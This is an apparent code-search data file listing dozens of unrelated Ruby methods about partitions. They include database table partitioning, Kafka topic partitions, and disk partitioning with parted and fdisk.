"def partitioned_tables\n PartitionedTables.new(connection).all\n end",
"def create_partition_of_table_sql(name, generator, options)\n sql = create_table_prefix_sql(name, options).dup\n\n sql << \" PARTITION OF #{quote_schema_table(options[:partition_of])}\"\n\n case generator.partition_type\n when :range\n from, to = generator.range\n sql << \" FOR VALUES FROM #{literal(from)} TO #{literal(to)}\"\n when :list\n sql << \" FOR VALUES IN #{literal(generator.list)}\"\n when :hash\n mod, remainder = generator.hash_values\n sql << \" FOR VALUES WITH (MODULUS #{literal(mod)}, REMAINDER #{literal(remainder)})\"\n else # when :default\n sql << \" DEFAULT\"\n end\n\n sql << create_table_suffix_sql(name, options)\n\n sql\n end",
"def all\n partitions.group_by { |row| row['table_name'] }.map(&method(:to_tablature_table))\n end",
"def list_partitions(table_name, params = {})\n all_params = approved_tables.smash(table_name, params)\n validation.validate_parameters(all_params)\n partitions(all_params)\n end",
"def create_table(name, options=OPTS, &block)\n if options[:partition_of]\n create_partition_of_table_from_generator(name, CreatePartitionOfTableGenerator.new(&block), options)\n return\n end\n\n super\n end",
"def create_partitions\n info(\"Creating disk with #{PARTITION_TABLE_TYPE} parition table\")\n execute!(\"parted -s #{@dev} mklabel #{PARTITION_TABLE_TYPE}\")\n\n start_size = FIRST_PARTITION_OFFSET\n end_size = FIRST_PARTITION_OFFSET\n\n unspec_part = nil\n\n # Create the partitions\n @partition_layout.each_with_index do |part, index|\n # Deal with any \"open ended\" partitions last\n if not part.size_mb.is_a?(Integer)\n unspec_part = part\n next\n end\n\n start_size = end_size\n end_size += part.size_mb\n\n info(\"Creating partition #{part.label} (#{part.fs}, #{part.size_mb}MiB)\")\n execute!(\"parted #{@dev} mkpart #{part.label} #{part.fs} #{start_size}MiB #{end_size}MiB\")\n\n (part.flags || {}).each_pair { |k, v|\n info(\"Setting partition flag #{k} to #{v}\")\n execute!(\"parted #{@dev} set #{index + 1} #{k} #{v}\")\n }\n\n label_path = \"/dev/disk/by-partlabel/#{part.label}\"\n self.wait_for_device(label_path)\n\n if not part.fs\n warn(\"No filesystem specified for #{part.label}. Skipping FS\")\n else\n create_filesystem(part.fs, label_path, part.label)\n end\n\n if part.lvm\n notice(\"Setting up LVM on #{part.label}\")\n setup_lvm_on_partition(part)\n end\n end\n\n # Deal with any \"open ended\" partitions (that have an unspecified size_mb)\n if unspec_part\n part = unspec_part\n info(\"Creating partition #{part.label} (#{part.fs}, 100% remaining)\")\n execute!(\"parted #{@dev} mkpart #{part.label} #{part.fs} #{end_size}MiB 100%\")\n\n (part.flags || {}).each_pair { |k, v|\n info(\"Setting partition flag #{k} to #{v}\")\n execute!(\"parted #{@dev} set #{@partition_layout.length} #{k} #{v}\")\n }\n\n label_path = \"/dev/disk/by-partlabel/#{part.label}\"\n self.wait_for_device(label_path)\n create_filesystem(part.fs, label_path, part.label) if part.fs\n\n if part.lvm\n notice(\"Setting up LVM on #{part.label}\")\n setup_lvm_on_partition(part)\n end\n end\n\n nil\n end",
"def partition_type\n raise Error, \"Unable to determine partition type, multiple different partitioning methods called\" if [@from || @to, @list, @modulus || @remainder, @default].compact.length > 1\n\n if @from || @to\n raise Error, \"must call both from and to when creating a partition of a table if calling either\" unless @from && @to\n :range\n elsif @in\n :list\n elsif @modulus || @remainder\n raise Error, \"must call both modulus and remainder when creating a partition of a table if calling either\" unless @modulus && @remainder\n :hash\n elsif @default\n :default\n else\n raise Error, \"unable to determine partition type, no partitioning methods called\"\n end\n end",
"def partition_list()\nend",
"def partitions\n [6, 3, 0].map { |n| model.id / 10**n % 1000 }\n end",
"def partitions( partition_count, &proc )\n Enumerable.partition_sizes( self.size, partition_count ) do |partition|\n partitioned_collection = []\n consumed_so_far = 0\n partition.each do |partition_size|\n partitioned_collection << self[ consumed_so_far, partition_size ]\n consumed_so_far += partition_size\n end\n yield partitioned_collection\n end\n end",
"def partition_for!(key)\n if leader_available?\n # Use the configured partitioner\n partition_id = partitioner.call(key, available_partitions.count, partitions.count)\n partition!(partition_id)\n else\n error_code.raise\n end\n end",
"def table_name(*partition_key_values)\n return collect_first(*partition_key_values, &:table_name)\n end",
"def set_partition\n @partition = Partition.find(params[:id])\n end",
"def partition!(id)\n partition(id) || ErrorCode[:unknown_topic_or_partition].raise\n end",
"def partition_device\n Souffle::Log.info \"#{@node.log_prefix} Partitioning the device...\"\n provider.partition(@node)\n end",
"def supports_indexes_on_partitioned_tables?\n postgresql_version >= 110_000\n end",
"def create_partition_of_table_from_generator(name, generator, options)\n execute_ddl(create_partition_of_table_sql(name, generator, options))\n end",
"def create_partition device, partition_type = 'primary', start_unit, end_unit\n command = 'parted'\n params = \"#{device.path} -s -a optimal unit MB mkpart #{partition_type} ext3 #{start_unit} -- #{end_unit}\"\n parted = CommandsExecutor.new command, params\n parted.execute\n raise \"Command execution error: #{parted.stderr.read}\" if not parted.success?\n probe_kernal device\n end",
"def SetFormatPartitions(fstabpart)\n fstabpart = deep_copy(fstabpart)\n # All storage devices\n target_map = Storage.GetTargetMap\n\n # all activated\n tmp = Builtins.filter(RootPart.GetActivated) do |e|\n Ops.get_string(e, :type, \"\") == \"mount\" ||\n Ops.get_string(e, :type, \"\") == \"swap\"\n end\n\n Builtins.foreach(tmp) do |e|\n mntpt = Ops.get_string(e, :type, \"\") == \"swap\" ?\n \"swap\" :\n Ops.get_string(e, :mntpt, \"\")\n part = Ops.get_string(e, :device, \"\")\n p = {}\n Builtins.foreach(fstabpart) do |pp|\n # mountpoint matches\n if Ops.get_string(pp, \"mount\", \"\") == mntpt\n p = deep_copy(pp)\n raise Break\n end\n end\n mount_options = \"\"\n Builtins.foreach(Storage.ReadFstab(Installation.destdir)) do |entry|\n if Ops.get_string(entry, \"file\", \"\") == mntpt\n mount_options = Ops.get_string(entry, \"mntops\", \"\")\n raise Break\n end\n end\n target_map = Storage.SetPartitionData(target_map, part, \"mount\", mntpt)\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"format\",\n Ops.get_boolean(p, \"format\", false)\n )\n target_map = Storage.SetPartitionData(target_map, part, \"delete\", false)\n target_map = Storage.SetPartitionData(target_map, part, \"create\", false)\n if Builtins.haskey(p, \"filesystem\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"filesystem\",\n Ops.get_symbol(p, \"filesystem\", :ext4)\n )\n end\n if Ops.greater_than(Builtins.size(mount_options), 0) &&\n !Builtins.haskey(p, \"fstopt\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"fstopt\",\n mount_options\n )\n end\n if Builtins.haskey(p, \"fstopt\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"fstopt\",\n Ops.get_string(p, \"fstopt\", \"\")\n )\n end\n if Builtins.haskey(p, \"mountby\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"mountby\",\n Ops.get_symbol(p, \"mountby\", :device)\n )\n end\n end\n\n Storage.SetTargetMap(target_map)\n true\n end",
"def create_range_partition(table_name, options, &block)\n raise ArgumentError, 'partition_key must be defined' if options[:partition_key].nil?\n\n Tablature.database.create_range_partition(table_name, options, &block)\n end",
"def addPartition(ptStr)\n pts_array = ptStr.split(',')\n sqlstr = \"ALTER TABLE \" + @mProjectName + \".\" + @mTableName\n sqlstr = sqlstr + \" ADD IF NOT EXISTS\" + \" PARTITION (\"\n pts_array.each { |pt|\n ptkv = pt.split('=')\n if ptkv.size != 2\n raise \"invalid partition spec\" + pt\n end\n sqlstr += ptkv[0] + '=' + \"'\" + ptkv[1] + \"'\" + ','\n }\n sqlstr = sqlstr[0..-2] + \");\"\n taskName = \"SQLAddPartitionTask\"\n runSQL(taskName, sqlstr)\n end",
"def partition(id)\n partitions.detect {|partition| partition.id == id}\n end",
"def make_partition_list(withall, flavor)\n part_list = []\n Builtins.foreach(RootPart.rootPartitions) do |partition, i|\n # see https://bugzilla.novell.com/attachment.cgi?id=96783&action=view\n\n # see bugzilla #288201\n # architecture needs to be valid when updating, not booting\n arch_is_valid = flavor == :boot ?\n true :\n Ops.get_boolean(i, :arch_valid, false)\n if withall || Ops.get_boolean(i, :valid, false) && arch_is_valid\n # `ext2, `jfs, ...\n part_fs = Ops.get_symbol(i, :fs)\n part_fs_name = Builtins.tostring(part_fs)\n if part_fs_name != nil &&\n Builtins.regexpmatch(part_fs_name, \"^`(.*)$\")\n part_fs_name = Builtins.regexpsub(part_fs_name, \"^`(.*)$\", \"\\\\1\")\n end\n\n system = Ops.get_string(i, :name, \"error\")\n # unknown system\n if system == \"unknown\"\n if part_fs != nil\n if CanBeLinuxRootFS(part_fs)\n # Table item (unknown system)\n system = _(\"Unknown Linux\")\n else\n # Table item (unknown system)\n system = _(\"Unknown or Non-Linux\")\n end\n else\n # Table item (unknown system [neither openSUSE 11.1 nor SLES 14 nor ...])\n system = _(\"Unknown\") if system == \"unknown\"\n end\n end\n\n arch = Ops.get_string(i, :arch, \"error\")\n # Table item (unknown architecture)\n arch = _(\"Unknown\") if arch == \"unknown\"\n\n # fist, use the name of file system (with short name for Linux)\n # then the file system short name\n # then \"Unknown\"\n fs = \"\"\n\n # is a linux fs, can be a root fs, has a fs name\n if part_fs != nil && Ops.get(i, :fstype) != nil &&\n CanBeLinuxRootFS(part_fs) &&\n part_fs_name != nil\n fs = Builtins.sformat(\n _(\"%1 (%2)\"),\n Ops.get_string(i, :fstype, \"\"),\n part_fs_name\n )\n else\n fs = Ops.get_string(i, :fstype, Ops.get_string(i, :fs, \"\"))\n end\n # Table item (unknown file system)\n fs = _(\"Unknown\") if fs == \"\"\n\n label = Ops.get_string(i, :label, \"\")\n\n part_list = Builtins.add(\n part_list,\n Item(Id(partition), system, partition, arch, fs, label)\n )\n end\n end\n deep_copy(part_list)\n end",
"def partition_used(partition)\n # Return magic number if in test_mode to prevent syscall\n return '128' if @test_mode\n b = ' ' * 128\n syscall(137, partition, b)\n a = b.unpack('QQQQQ')\n [a[2] * blocks_per_kilobyte, a[4] * blocks_per_kilobyte]\n end",
"def addPartition(ptStr)\n @mOdpsTable.addPartition(ptStr)\n end",
"def partitions\n topics.values.flat_map(&:partitions)\n end",
"def CreatePartition(disk, device, ptype, id, start, len, mby)\n Builtins.y2milestone(\n \"CreatePartition disk:%1 device:%2 ptype:%3 id:%4 start:%5 len:%6 mby:%7\",\n disk,\n device,\n ptype,\n id,\n start,\n len,\n mby\n )\n pt = fromSymbol(@conv_ptype, ptype)\n Builtins.y2milestone(\"CreatePartition type:%1 pt:%2\", ptype, pt)\n ret, cdev = @sint.createPartition(disk, pt, start, len)\n cdev = \"\" if ret<0\n if device != cdev\n Builtins.y2error(\"CreatePartition device:%1 cdev:%2\", device, cdev)\n end\n Builtins.y2error(\"CreatePartition ret %1\", ret) if ret<0\n ret = @sint.changePartitionId(device, id)\n Builtins.y2error(\"CreatePartition ret %1\", ret) if ret<0\n tmp = fromSymbol(@conv_mountby, mby)\n @sint.changeMountBy(device, tmp)\n Builtins.y2milestone(\"CreatePartition sint ret:%1\", ret)\n UpdateTargetMap()\n ret == 0\n end",
"def partition\n return enum_for(:partition) if not block_given?\n a,b = super\n [self.class.new(a), self.class.new(b)].freeze\n end",
"def create_partition(size = nil, type = Partition.PartitionType[:TYPE_PRIMARY])\n DiskUtils.create_partition self, size[:start_block], size[:end_block]\n partitions = Device.find(self).partitions\n return partitions.last\n end",
"def partition\n PredicatePartition.new(predicate, operand.left.header, operand.right.header)\n end",
"def add_partition_key(name, type)\n PartitionKey.new(name, type(type)).tap do |column|\n @partition_key_columns << add_column(column)\n end\n end",
"def GetPartitionList\n deep_copy(@partition_info)\n end",
"def create_list_partition_of(parent_table_name, options)\n if options[:values].blank? && options[:default].blank?\n raise ArgumentError, 'values or default must be defined'\n end\n\n Tablature.database.create_list_partition_of(parent_table_name, options)\n end",
"def partition_lookup\n return @partition_lookup unless @partition_lookup.nil?\n io = _root._io\n _pos = io.pos\n io.seek(_root.sector_size)\n @_raw_partition_lookup = io.read_bytes(sector_size)\n _io__raw_partition_lookup = Kaitai::Struct::Stream.new(@_raw_partition_lookup)\n @partition_lookup = PartitionEntry.new(_io__raw_partition_lookup, self, @_root)\n io.seek(_pos)\n @partition_lookup\n end",
"def dynamic_partition(data, partitions, num_partitions, name: nil)\n result = _op(:dynamic_partition, data, partitions, num_partitions: num_partitions, name: nil)\n num_partitions.times.map do |index|\n result[index]\n end\n end",
"def list_partitions_with_size_and_type # by nelsongs. => list: partition size type\n\treturn `fdisk -l | grep /dev | grep -v Disk | awk '{if ($2==\"*\") print $1\":\"$5\":\"$6;else print $1\":\"$4\":\"$5}' | sed s/+//g`.split\nend",
"def dump_partition_indexes(partitioned_table, stream)\n return unless Tablature.database.respond_to?(:indexes_on)\n\n indexes = Tablature.database.indexes_on(partitioned_table.name)\n return if indexes.empty?\n\n add_index_statements = indexes.map do |index|\n table_name = remove_prefix_and_suffix(index.table).inspect\n \" add_index #{([table_name] + index_parts(index)).join(', ')}\"\n end\n\n stream.puts add_index_statements.sort.join(\"\\n\")\n stream.puts\n end",
"def onepartition2fstab(part, other_nr)\n part = deep_copy(part)\n Builtins.y2milestone(\"onepartition2fstab part=%1\", part)\n if Ops.get_boolean(part, \"delete\", false) ||\n Ops.get_symbol(part, \"type\", :unknown) == :extended ||\n Builtins.contains(\n [:lvm, :sw_raid, :evms],\n Ops.get_symbol(part, \"type\", :unknown)\n ) &&\n Builtins.size(Ops.get_string(part, \"mount\", \"\")) == 0 ||\n Ops.get_symbol(part, \"enc_type\", :none) != :none &&\n !Ops.get_boolean(part, \"noauto\", false) ||\n !IsUsedBy(part) ||\n Builtins.contains(\n [\n Partitions.fsid_prep_chrp_boot,\n Partitions.fsid_lvm,\n Partitions.fsid_raid\n ],\n Ops.get_integer(part, \"fsid\", 0)\n ) &&\n Builtins.size(Ops.get_string(part, \"mount\", \"\")) == 0\n return {}\n end\n\n spec = Ops.get_string(part, \"device\", \"\")\n if Ops.get_symbol(part, \"mountby\", :device) == :label &&\n Ops.greater_than(Builtins.size(Ops.get_string(part, \"label\", \"\")), 0)\n spec = Builtins.sformat(\"LABEL=%1\", Ops.get_string(part, \"label\", \"\"))\n elsif Ops.get_symbol(part, \"mountby\", :device) == :uuid &&\n Ops.greater_than(Builtins.size(Ops.get_string(part, \"uuid\", \"\")), 0)\n spec = Builtins.sformat(\"UUID=%1\", Ops.get_string(part, \"uuid\", \"\"))\n end\n Builtins.y2debug(\"onepartition2fstab spec=%1\", spec)\n mount_point = Ops.get_string(part, \"mount\", \"\")\n fsid = Ops.get_integer(part, \"fsid\", 0)\n\n used_fs = Ops.get_symbol(part, \"used_fs\", :ext2)\n format = Ops.get_boolean(part, \"format\", false)\n\n vfstype = \"unknown\" # keep \"unknown\", used again below\n freq = 0\n passno = 0\n mntops = Ops.get_string(part, \"fstopt\", \"\")\n\n if mount_point == \"swap\"\n vfstype = \"swap\"\n if Builtins.isempty(mntops)\n mntops = Ops.get_string(\n FileSystems.GetFstabDefaultMap(\"swap\"),\n \"mntops\",\n \"\"\n )\n end\n passno = 0\n elsif fsid == Partitions.fsid_native || fsid == Partitions.fsid_lvm ||\n Ops.get_symbol(part, \"type\", :unknown) == :evms &&\n Ops.get_symbol(part, \"detected_fs\", :none) != :unknown\n vfstype = FileSystems.GetMountString(used_fs, format ? 
\"ext2\" : \"auto\")\n\n freq = 1\n if mount_point == \"/\"\n passno = 1\n elsif mount_point != \"\"\n passno = 2\n elsif Stage.initial && !Arch.s390\n mount_point = Ops.add(\"/data\", other_nr.value)\n # Don't mount and fsck this filesystem during boot, its\n # state is unknown.\n mntops = \"noauto,user\"\n vfstype = \"auto\"\n freq = 0\n passno = 0\n other_nr.value = Ops.add(other_nr.value, 1)\n Builtins.y2milestone(\"TT add MountPoint %1\", mount_point)\n end\n elsif (Arch.i386 || Arch.ia64 || Arch.x86_64) &&\n Ops.greater_than(Builtins.size(mount_point), 0) &&\n (used_fs == :vfat || used_fs == :ntfs) &&\n (Builtins.contains(\n Builtins.union(\n Builtins.union(\n Partitions.fsid_dostypes,\n Partitions.fsid_ntfstypes\n ),\n Partitions.fsid_wintypes\n ),\n fsid\n ) ||\n fsid == Partitions.fsid_gpt_boot)\n freq = 0\n passno = 0\n lower_point = Builtins.tolower(mount_point)\n if lower_point != \"\" && mount_point != lower_point\n lower_point = PathToDestdir(lower_point)\n Builtins.y2milestone(\n \"symlink %1 -> %2\",\n Builtins.substring(\n mount_point,\n Ops.add(Builtins.findlastof(mount_point, \"/\"), 1)\n ),\n lower_point\n )\n SCR.Execute(\n path(\".target.symlink\"),\n Builtins.substring(\n mount_point,\n Ops.add(Builtins.findlastof(mount_point, \"/\"), 1)\n ),\n lower_point\n )\n end\n vfstype = FileSystems.GetMountString(used_fs, \"auto\")\n elsif (Arch.sparc || Arch.alpha) &&\n Builtins.contains(Partitions.fsid_skipped, fsid)\n return {} # skip \"whole disk\" partition\n else\n return {} # unknown type\n end\n if Ops.get_symbol(part, \"detected_fs\", :unknown) == :unknown ||\n Ops.get_boolean(part, \"noauto\", false)\n passno = 0\n end\n\n ret = {\n \"spec\" => spec,\n \"mount\" => mount_point,\n \"vfstype\" => vfstype,\n \"mntops\" => mntops,\n \"freq\" => freq,\n \"device\" => Ops.get_string(part, \"device\", \"\"),\n \"passno\" => passno\n }\n\n if Builtins.size(Ops.get_string(ret, \"mntops\", \"\")) == 0\n Ops.set(ret, \"mntops\", \"defaults\")\n end\n\n Builtins.y2milestone(\"onepartition2fstab ret=%1\", ret)\n deep_copy(ret)\n end",
"def partitions_to_append(partition_start_timestamp, partition_size_unit, partition_size, days_into_future)\n _validate_positive_fixnum(:days_into_future, days_into_future)\n\n end_timestamp = @tuc.advance(current_timestamp, :days, days_into_future)\n partitions_to_append_by_ts_range(partition_start_timestamp, end_timestamp, partition_size_unit, partition_size)\n end",
"def on_partitions_assigned(_, partitions)\n @assigned_partitions = partitions.to_h.transform_values { |part| part.map(&:partition) }\n @changed = true\n end",
"def partitioned_state\n super\n end",
"def setPartitionType(settings)\n settings = deep_copy(settings)\n tm = Storage.GetTargetMap\n settings = Builtins.maplist(settings) do |d|\n if Ops.get_symbol(d, \"type\", :x) == :CT_DISK\n mp = Ops.get_integer(\n tm,\n [Ops.get_string(d, \"device\", \"xxx\"), \"max_primary\"],\n 0\n )\n if Ops.greater_than(mp, 0)\n Ops.set(\n d,\n \"partitions\",\n Builtins.maplist(Ops.get_list(d, \"partitions\", [])) do |pe|\n if Builtins.haskey(pe, \"partition_nr\") &&\n !Builtins.haskey(pe, \"partition_type\") &&\n Ops.less_or_equal(\n Ops.get_integer(pe, \"partition_nr\", -1),\n mp\n )\n Ops.set(pe, \"partition_type\", \"primary\")\n end\n deep_copy(pe)\n end\n )\n end\n end\n deep_copy(d)\n end\n Builtins.y2milestone(\"after setPartitionType = %1\", settings)\n deep_copy(settings)\n end",
"def query_partitions(partition_filter, statement, options = nil)\n policy = create_policy(options, QueryPolicy, default_query_policy)\n new_policy = policy.clone\n\n nodes = @cluster.nodes\n if nodes.empty?\n raise Aerospike::Exceptions::Aerospike.new(Aerospike::ResultCode::SERVER_NOT_AVAILABLE, \"Query failed because cluster is empty.\")\n end\n\n # result recordset\n recordset = Recordset.new(policy.record_queue_size, 1, :query)\n tracker = PartitionTracker.new(policy, nodes, partition_filter)\n Thread.new do\n Thread.current.abort_on_exception = true\n QueryExecutor.query_partitions(@cluster, policy, tracker, statement, recordset)\n end\n\n recordset\n end",
"def partition_selector\n @subhash = {}\n @filters = {}\n\n partition_selector_hash @selector, []\n end",
"def partitions_to_append_by_ts_range(partition_start_timestamp, end_timestamp, partition_size_unit, partition_size)\n if partition_size_unit.nil? || !VALID_PARTITION_SIZE_UNITS.include?(partition_size_unit)\n _raise_arg_err \"partition_size_unit must be one of: #{VALID_PARTITION_SIZE_UNITS.inspect}\"\n end\n\n _validate_positive_fixnum(:partition_size, partition_size)\n _validate_positive_fixnum(:partition_start_timestamp, partition_start_timestamp)\n _validate_positive_fixnum(:end_timestamp, end_timestamp)\n\n timestamp = partition_start_timestamp\n\n partitions_to_append = {}\n while timestamp < end_timestamp\n timestamp = @tuc.advance(timestamp, partition_size_unit, partition_size)\n\n partition_name = name_from_timestamp(timestamp)\n partitions_to_append[partition_name] = timestamp\n end\n\n partitions_to_append\n end",
"def partition_params\n params.require(:partition).permit(:name, :body, :chapter_id)\n end",
"def add_partition_to_node( tp, node )\n\n @nodes_lists_replicas[node][tp] = ''\n @partitions_lists[tp]['replicas'] ||= {}\n @partitions_lists[tp]['replicas'][node] = ''\n end",
"def parent_table_schema_name(*partition_key_values)\n return collect_first(*partition_key_values, &:parent_table_schema_name)\n end",
"def parent_table_name(*partition_key_values)\n return collect_first(*partition_key_values, &:parent_table_name)\n end",
"def key_partition\n Dynamoid::Config.partitioning? ? \".#{Random.rand(Dynamoid::Config.partition_size)}\" : ''\n end",
"def hadoop_partition_args\n if options[:partition_fields]\n [\n '-partitioner org.apache.hadoop.mapred.lib.KeyFieldBasedPartitioner',\n jobconf(:output_field_separator),\n jobconf(:partition_fields),\n ]\n end\n end",
"def partitions(key, partitions)\n master = fnv_hash(key) % partitions.size\n selected = [master]\n nodes = [partitions[master]]\n current = (master + 1) % partitions.size\n\n # Walk clockwise around the ring of partitions, starting from the master partition.\n # The next few unique nodes in ring order are the replicas.\n while current != master && selected.size < @replicas\n if !nodes.include? partitions[current]\n nodes << partitions[current]\n selected << current\n end\n current = (current + 1) % partitions.size\n end\n\n selected\n end",
"def create_partition_to_fill_disk(disk)\n # @disk.create_partition('primary', '100%')\n disk.create_partition_table # LinuxAdmin::Disk.create_partition has this already...\n AwesomeSpawn.run!(\"parted -s #{disk.path} mkpart primary 0% 100%\")\n\n # FIXME: Refetch the disk after creating the partition\n disk = LinuxAdmin::Disk.local.find { |d| d.path == disk.path }\n disk.partitions.first\n end",
"def partition(arr, n)\n\nend",
"def isPartition(partition)\n partition = deep_copy(partition)\n AutoinstCommon.isValidObject(@fields, partition)\n end",
"def create_with_partition(partition)\n NicView.new(fqdd.gsub(/[-]\\d+$/, \"-#{partition}\"))\n end",
"def split_partitions\n partition_names = @list.map { |bin| bin.partition_names }.flatten\n partition_names.select { |name| partition_names.index(name) != partition_names.rindex(name) }.uniq\n end",
"def GetPartitionLst(tg, device)\n tg = deep_copy(tg)\n ret = []\n tmp = GetDiskPartitionTg(device, tg)\n Builtins.y2milestone(\"GetPartitionLst tmp:%1\", tmp)\n Builtins.foreach(tmp) do |m|\n disk = Ops.get_string(m, \"disk\", \"\")\n if Builtins.search(device, \"/dev/evms\") == 0 &&\n !Builtins.haskey(tg, disk)\n disk = \"/dev/evms\"\n end\n Builtins.y2debug(\"GetPartitionLst device=%1 disk=%2\", device, disk)\n part = Builtins.filter(Ops.get_list(tg, [disk, \"partitions\"], [])) do |p|\n Ops.get_string(p, \"device\", \"\") == device\n end\n part = Builtins.filter(part) { |p| !Ops.get_boolean(p, \"delete\", false) }\n if Builtins.size(part) == 0 && Ops.is_integer?(Ops.get(m, \"nr\", 0))\n part = Builtins.filter(Ops.get_list(tg, [disk, \"partitions\"], [])) do |p|\n Ops.get_integer(p, \"nr\", -1) == Ops.get_integer(m, \"nr\", 0)\n end\n part = Builtins.filter(part) do |p|\n !Ops.get_boolean(p, \"delete\", false)\n end\n end\n if Builtins.size(part) == 0\n part = Builtins.filter(Ops.get_list(tg, [disk, \"partitions\"], [])) do |p|\n Ops.get_string(p, \"name\", \"\") == Ops.get_string(m, \"nr\", \"\")\n end\n part = Builtins.filter(part) do |p|\n !Ops.get_boolean(p, \"delete\", false)\n end\n end\n pa = Ops.get(part, 0, {})\n if Builtins.size(pa) == 0 &&\n Builtins.search(device, \"/dev/mapper/\") == 0\n part = Builtins.filter(\n Ops.get_list(tg, [\"/dev/mapper\", \"partitions\"], [])\n ) { |p| Ops.get_string(p, \"device\", \"\") == device }\n pa = Ops.get(part, 0, {})\n end\n if Builtins.size(pa) == 0 &&\n Builtins.search(device, \"/dev/mapper/\") == 0\n part = Builtins.filter(\n Ops.get_list(tg, [\"/dev/loop\", \"partitions\"], [])\n ) { |p| Ops.get_string(p, \"device\", \"\") == device }\n pa = Ops.get(part, 0, {})\n end\n ret = Builtins.add(ret, pa) if Ops.greater_than(Builtins.size(pa), 0)\n end\n Builtins.y2debug(\"GetPartitionLst ret=%1\", ret)\n deep_copy(ret)\n end",
"def create_tables\n x = 1\n table_count = (all_guests.length / table_size_limit.to_f).ceil\n while x <= table_count\n Table.create(table_number: x, table_size_limit: table_size_limit, event_id: id)\n x += 1\n end\n end",
"def partition(partition_key)\n state_depth_must_be(States::RELATION)\n if @current_relation.partitions.include?(partition_key)\n raise \"duplicate partition key #{partition_key}\"\n end\n @current_relation.partitions << partition_key\n end",
"def table_elements(identifier)\n platform.tables_for(identifier.clone)\n end",
"def list_swap_partitions_with_type_and_size # nelsongs\n\treturn `fdisk -l | grep /dev | grep -v Disk | awk '{if ($2==\"*\" && $6==\"82\") print $1\":\"$5\":\"$6;else {if ($5==\"82\") print $1\":\"$4\":\"$5}}' | sed s/+//g`.chomp.split\nend",
"def partition_pattern(prefix, partitioned)\n pattern = case partitioned\n when :weekly\n Array.new(8, '_').join\n when :monthly\n Array.new(6, '_').join\n else\n raise \"Unrecognized option for 'partitioned': #{partitioned}\"\n end\n \"#{prefix}_#{pattern}\"\n end",
"def partition(predicate)\n each_operand(predicate) do |operand|\n case operand\n when Axiom::Function::Binary then partition_binary(operand)\n when Axiom::Function::Unary then partition_unary(operand)\n when Axiom::Attribute::Boolean then partition_attribute(operand)\n else\n partition_proposition(operand)\n end\n end\n end",
"def bootloader_partitions\n raise RuntimeError, \"Not implemented in base class\"\n end",
"def supports_list_partitions?\n postgresql_version >= 100_000\n end",
"def indexes_on(partitioned_table)\n return [] if Gem::Version.new(Rails.version) >= Gem::Version.new('6.0.3')\n return [] unless connection.supports_indexes_on_partitioned_tables?\n\n Indexes.new(connection).on(partitioned_table)\n end",
"def available_partitions\n partitions.select(&:available?)\n end",
"def problem_76\n return 100.partitions - 1\nend",
"def partition( header, &block )\n data.partition( header, &block ).map { |d| dup.load( d ) }\n end",
"def partition_and_process_non_tabular_lines\n non_tabular_lines.each do |line|\n if line =~ @start_line_pattern\n # This is a start line\n start_record(line)\n elsif line =~ @end_line_pattern\n # This is an end line\n end_record(line)\n else\n @non_tabular_record << line if @in_a_record\n end\n end\n end",
"def partition_check_device(devicename)\n if External.cmd(@server, \"/usr/bin/sudo /sbin/fdisk -l #{devicename}\").include? \"Disk #{devicename} doesn't contain a valid partition table\"\n false\n else\n true\n end\n end",
"def partition\n @articles.each do |article|\n minimum_bucket(article['read_time'].to_i) << article\n end\n end",
"def IsPartitionable(entry)\n entry = deep_copy(entry)\n Ops.get_symbol(entry, \"type\", :CT_UNKNOWN) == :CT_DMRAID ||\n Ops.get_symbol(entry, \"type\", :CT_UNKNOWN) == :CT_DMMULTIPATH ||\n Ops.get_symbol(entry, \"type\", :CT_UNKNOWN) == :CT_MDPART ||\n IsRealDisk(entry)\n end",
"def write(table,data,partition_key=nil)\n\n ## Get table schema...\n schema = get_table_schema(table)\n\n if schema == nil\n raise \"Scheme does not exist for table name ='#{table}'\"\n end\n\n ## Ensure that the keys in the passed data are symbols (this is what's expected)\n data.keys.each do |key|\n if(key.is_a?(Symbol) == false)\n raise \"Data key #{key} is not a symbol!\"\n # TODO: CONVERT string keys to symbols instead of raising\n end\n end\n\n intersection = schema[:columns].keys & data.keys\n\n ## Validate no data keys are passed that are not in table schema\n data.keys.each do |key|\n if(intersection.include?(key) == false)\n raise \"Data key #{key} is not in schema for #{table} table!!\"\n end\n end\n\n ## Validate that columns are not null\n schema[:columns].each do |column_name,column|\n if(column.keys.include?(:constraint) == true && column[:constraint] == \"not null\" && intersection.include?(column_name) == false)\n raise \"Column #{column_name} is missing from passed data\"\n end\n end\n\n ## Validate column types\n schema[:columns].each do |column_name,column|\n if(intersection.include?(column_name) == true)\n\n value = data[column_name.to_sym]\n column_type = column[:type]\n\n if column_type['('] != nil\n type_name = column_type[/(.*)\\(.*/,1]\n else\n type_name = column_type\n end\n\n type_name_downcased = type_name.downcase\n\n if @valid_data_types.include? type_name_downcased\n type_name_check_function = \"check_#{type_name_downcased.gsub(' ','_')}\".to_sym\n data[column_name.to_sym] = @data_types.send(type_name_check_function,value,column_type,column_name)\n else\n raise \"Invalid data type #{type_name}. Valid types [#{@valid_data_types.join(\",\")}]\"\n end\n end\n end\n\n ## Serialize as json, we load the data as JSON into redshift\n data_string=data.to_json\n\n ## Write the serialized data string to the broker\n partition_key = partition_key || rand(100).to_s\n stream_name = @broker.stream_name(table)\n result = @broker.stream_write(stream_name, data_string, partition_key)\n\n return result\n end",
"def query(statement, options = nil)\n query_partitions(Aerospike::PartitionFilter.all, statement, options)\n end",
"def partition(&block) # :nodoc:\n resolve\n result = @items.partition(&block)\n [\n self.class.new.import(result[0]),\n self.class.new.import(result[1]),\n ]\n end",
